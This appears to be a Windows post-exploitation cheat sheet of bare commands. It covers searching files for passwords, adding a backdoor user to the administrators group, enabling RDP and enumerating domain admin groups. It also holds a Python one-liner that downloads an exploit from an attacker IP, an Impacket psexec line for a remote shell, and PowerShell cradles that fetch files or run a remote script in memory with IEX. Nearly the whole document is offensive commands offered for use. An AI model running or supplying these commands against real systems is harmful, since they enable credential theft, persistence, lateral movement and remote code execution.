systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
findstr /s /n /i /p /c:"password" *.txt
===================================================================
Using NET
net user [username] [password] /add
net localgroup administrators [username] /add
net start TermService (starts the RDP service)
netsh firewall show state
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
===================================================================
Using Python like wget
C:\python26\python.exe -c "import urllib2; u = urllib2.urlopen('http://10.11.0.108:4445/35936.py'); localFile = open('local_file', 'wb'); localFile.write(u.read()); localFile.close()"
===================================================================
Getting shells as a user
WMI
SMB
Impacket
/usr/share/doc/python-impacket/examples/psexec.py DOMAIN/USER@IP cmd.exe
===================================================================
Transferring files
PowerShell
powershell -c "(New-Object Net.WebClient).DownloadFile('http://whatever.com/file.exe', 'file.exe')"
OR
powershell -c "(New-Object Net.WebClient).DownloadFile('http://whatever.com:1234/file.exe', 'file.exe')"
OR (download a script and run it in memory; DownloadString takes only the URL)
powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://whatever.com:1234/file.ps1')"
OR
powershell -c "IWR -Uri http://whatever.com/file.exe -OutFile file.exe"
==================================================================